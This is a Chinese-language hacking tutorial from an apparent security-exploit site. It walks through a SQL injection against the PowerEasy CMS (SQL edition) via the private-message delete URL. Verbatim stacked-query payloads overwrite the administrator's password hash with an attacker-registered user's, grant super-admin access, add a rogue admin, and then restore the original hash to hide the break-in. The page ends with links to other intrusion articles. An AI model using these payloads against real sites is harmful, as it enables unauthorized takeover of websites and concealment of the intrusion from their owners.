动易SQL版新洞利用短信功能直接拿后台

所属分类: 实用技巧 / 漏洞研究 阅读数: 1833
收藏 0 赞 0 分享
先注册个号,进入控制面版给自己发条短信  

http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4  
这就是点```  
用户名为admin  奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为  
=没有登陆````ef0020cf8c5e45b9 密码是这个```  
下面就开始将管理员的密码更新为我注册用户的密码````  
利用动易爆库改库程序先将pe_admin里adminname,password字段爆出来.....  
);update pe_admin set password=(select userpassword from pe_user 
 where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b) 
%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--  
这语句的意思就是将PE——ADMIN表中ID=1的用户的密码更新为PE_USER表中 user的密码```好``现在来看```需要将hack520转char  
更新成功`~~~~现在已经将PE_admin表ID=1的用户的密码更新为hack520的密码````再看一下```  
53dc3b60f2d40cd4这个是我前面注册的密码```好现在登陆后台看看  
您的用户名:admin   
您的身份:超级管理员   
待阅短信: 1 条   
成功````然后为自己加个管理员`然后利用以下语句`将管理员的密码更新回来  
user  
就是注册的用户名````````时间不多```进得了后台就不管其他的先了````拿WEBSHELL以后再说```  
刚刚时间到了,现在继续。。。将管理员密码改回来.  
);declare @a sysname select @a=0x650066003000300032003000630066 
0038006300350065003400350062003900 update pe_admin set passwo 
rd=@a--  这个要转一下  

更新```把管理员密码改回来  OK我们再看看修改成功没```ef0020cf8c5e45b9这个是原来的密码吧?  
好了就到此结束! 
更多精彩内容其他人还在看

对Serv-U 6.0.0.2默认帐户及密码的一点理解

对Serv-U 6.0.0.2默认帐户及密码的一点理解
收藏 0 赞 0 分享

用asp记录论坛用户密码(dvbbs,leadbbs等)

用asp记录论坛用户密码(dvbbs,leadbbs等)
收藏 0 赞 0 分享

网吧破解:让你在网吧上霸王网

网吧破解:让你在网吧上霸王网
收藏 0 赞 0 分享

关于对河南网通封锁局域网共享上网的破解

关于对河南网通封锁局域网共享上网的破解
收藏 0 赞 0 分享

网吧入侵之攻无不克!

网吧入侵之攻无不克!
收藏 0 赞 0 分享

老兵新传-各种漏洞的利用和一些搜索参数

这篇文章主要介绍了老兵新传-各种漏洞的利用和一些搜索参数
收藏 0 赞 0 分享

用漏洞提升计算机控制权限(图)

用漏洞提升计算机控制权限(图)
收藏 0 赞 0 分享

从广告邮件到肉鸡成群(图)

从广告邮件到肉鸡成群(图)
收藏 0 赞 0 分享

JSP中的源代码泄漏问题

JSP中的源代码泄漏问题
收藏 0 赞 0 分享

河南移动网络客服系统验证码的缺陷分析和利用!

河南移动网络客服系统验证码的缺陷分析和利用!
收藏 0 赞 0 分享
查看更多